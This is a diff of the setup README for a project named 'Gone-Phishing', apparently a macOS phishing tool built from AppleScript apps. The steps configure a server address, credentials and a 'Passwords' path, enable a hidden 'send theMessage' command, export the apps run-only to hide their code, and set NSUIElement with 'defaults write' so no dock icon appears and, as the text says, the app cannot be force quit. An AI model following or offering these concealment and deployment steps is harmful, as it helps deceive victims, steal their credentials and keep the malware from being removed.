benb116/Gone-Phishing/Readme.md

 	becomes

-		set myuser to "Benb116"		set mypass to "12345"		set myserv to "123.456.789.0"		set mypath to "/Desktop/Passwords/"3.
+		set myuser to "Benb116"		set mypass to "12345"		set myserv to "123.456.789.0"		set mypath to "/Desktop/Passwords/"4.
 Optional: in App.applescript, find the comment "--send theMessage."
 Remove the "--" to make this an actual command that will actually send out the email.
-4. Export "App.applescript", "Updater.applescript", and "DK.applescript" as **run-only** applications.
+5. Export "App.applescript", "Updater.applescript", and "DK.applescript" as **run-only** applications.
 	* "Updater.applescript" and "DK.applescript" **must** be made into apps named "Updater" and "DK" respectively.
 You can name "App.app" whatever you want.

-4. In each app, open "appname.app/contents/Info.plist" in TextEdit.
-5. Add the folowing two lines of code to the "Info.plist" file

-		<key>NSUIElement</key>
- 		<string>1</string>
+6. Run the following Terminal commands **with each app**:

+		defaults write <app path>/Contents/Info.plist 'NSUIElement' '1'
 (this prevents a dock icon from appearing and also makes it impossible to force quit the app)
-5. Add "icon.icns" to the resources folders of "App.app" and "Updater.app"
+7. Add "icon.icns" to the resources folders of "App.app" and "Updater.app"
 8. Copy Updater.app and DK.app to the resources folder of "App.app"